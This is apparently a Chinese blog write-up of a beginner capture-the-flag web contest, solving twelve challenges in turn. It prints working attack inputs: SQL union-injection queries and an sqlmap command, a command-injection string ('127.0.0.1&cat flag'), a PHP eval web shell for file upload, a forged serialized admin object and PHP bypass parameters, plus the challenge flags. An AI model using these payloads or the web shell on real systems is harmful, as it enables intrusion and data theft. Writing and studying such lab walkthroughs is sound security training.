• SNERT预备队招新CTF体验赛-Web(SWCTF)


    目录

    1、F12

    2、robots

    3、game1-喂青蛙

    4、game 2 - flap bird

    5、game 3 - Clash

    6、Get&Post

    7、sql

    (1)手工注入

    (2)工具注入

    8、命令执行漏洞

    9、文件上传漏洞

    10、文件泄露

    11、php反序列化漏洞

    12、PHP绕过


    1、F12

    根据题目提示直接F12看源代码在注释里找到flag

    flag{s0_eaSyest_wEb_fl2} 

    2、robots

    直接访问robots.txt

    得到

    继续访问Myon.php

    拿到flag

    flag{oH_My_bOy_You_fiNd_mE!}

    3、game1-喂青蛙

    找到输出flag的判断条件,直接改为if(1),Ctrl+S保存,开始等待时间结束即可

    或者自己打到66或56分也会得到flag,也可以改成自己希望输出flag的分数再打到对应分数即可

    flag{b928e21ad8b3ab6698e3c273e39eda5b}

    4、game 2 - flap bird

    随便玩玩就出flag

    flag{9c5046d299ac704475bcd7d6c56c9519}

    5、game 3 - Clash

    打爆中间的boss就出flag

    flag{16da83e9da66fcd097c1032aa2f6ca3b}

    6、Get&Post

    简单的get和post传参,根据要求传入对应内容即可

    flag{welcome-to-ctf-enjoy} 

    7、sql

    简单的SQL注入

    (1)手工注入

    使用order by判断一下字段数:

    试到3的时候后报错,说明有两列

    查数据库名:

    union select 1,database()

    发现数据库名为test

    查该数据库下的所有表名:

    union select 1,table_name from information_schema.tables where table_schema='test'

    发现该数据库下有一个名为flag的表

    直接在该表下尝试查询关键字flag:

    union select 1,flag from flag

    拿到flag 

    snert{9c565f3584a8e7ad64a73996b615811b}

    (2)工具注入

    由于这里不存在任何过滤和绕过,使用sqlmap跑一下,只需要提供注入点是id,直接得flag

    sqlmap -u "http://snert.vip:8079/?id=1" --dump

    8、命令执行漏洞

    随便ping一个ip之后发现ping命令被执行了

    我们在ip后使用&进行连接,后面接其他想要执行的命令

    127.0.0.1&ls

    可以看到存在flag,直接cat flag

    127.0.0.1&cat flag 

    flag{Myon_myon_my}

    9、文件上传漏洞

    很明显的文件上传,并且这里不存在任何绕过

    直接上传一句话木马

     @eval($_POST['cmd']);?>

    根据题目提示,文件会被传到uploads目录下

    使用蚁剑尝试连接

    找到flag 

    flag{just_easy_wjsc}

    10、文件泄露

    根据题目提示,扫描一下目录

    发现存在robots.txt

    访问之后发现另一个文件地址 /wzym123.zip

    直接访问该地址,将文件下载下来

    经过寻找最终在sqqyw.sql下找到flag

    flag{!@#$kobi123}

    11、php反序列化漏洞

    简单审计一下PHP代码,这里需要给参数data传入序列化的user对象

    原本 $isAdmin = false

    输出flag的判断条件:

    if ($user->isAdmin) {

    echo "Welcome, admin!";
                include("flag.php");
                echo $flag;

    判断use是不是admin(其实就是调用user这个类下的参数isAdmin)
    只需要将isAdmin改为true,再将整个类进行序列化,传给data即可

    php代码:

    1. class User {
    2. public $username;
    3. public $isAdmin = true;
    4. }
    5. $u = new User();
    6. echo serialize($u);
    7. ?>

    使用get方法给data传入序列化后的内容

    payload:O:4:"User":2:{s:8:"username";N;s:7:"isAdmin";b:1;}

    回显flag

    flag{its_an_1Z_PHP_unserialize}

    12、PHP绕过

    就是一些对PHP常见特性和函数的绕过

    这里payload有很多,我只给出一个示例

    1. payload:
    2. ?myon1[]=1&&myon2[]=2
    3. myon3[]=3&&myon4[]=4&&swust[]=1&&hacker=1e10&&lover=0

    关于这些PHP特性绕过的详细讲解可以参考我另一篇博客

    http://t.csdnimg.cn/L3qKj

  • 相关阅读:
    计算机考研统考科目408思维导图
    瑞芯微RK3568|SDK开发之Buildroot编译
    C++运算符重载实现的过程,代码
    Docker-Cgroup
    动态规划算法的题到底应该怎么做?思路教给你自己写
    如何批量修改图片宽高尺寸
    在C++中怎么把std::string类型的数字转成int类型的数字
    GPT-4o
    2022年最火的十大测试工具,你掌握了几个
    使用Spring进行文件的上传和下载
  • 原文地址:https://blog.csdn.net/Myon5/article/details/133501612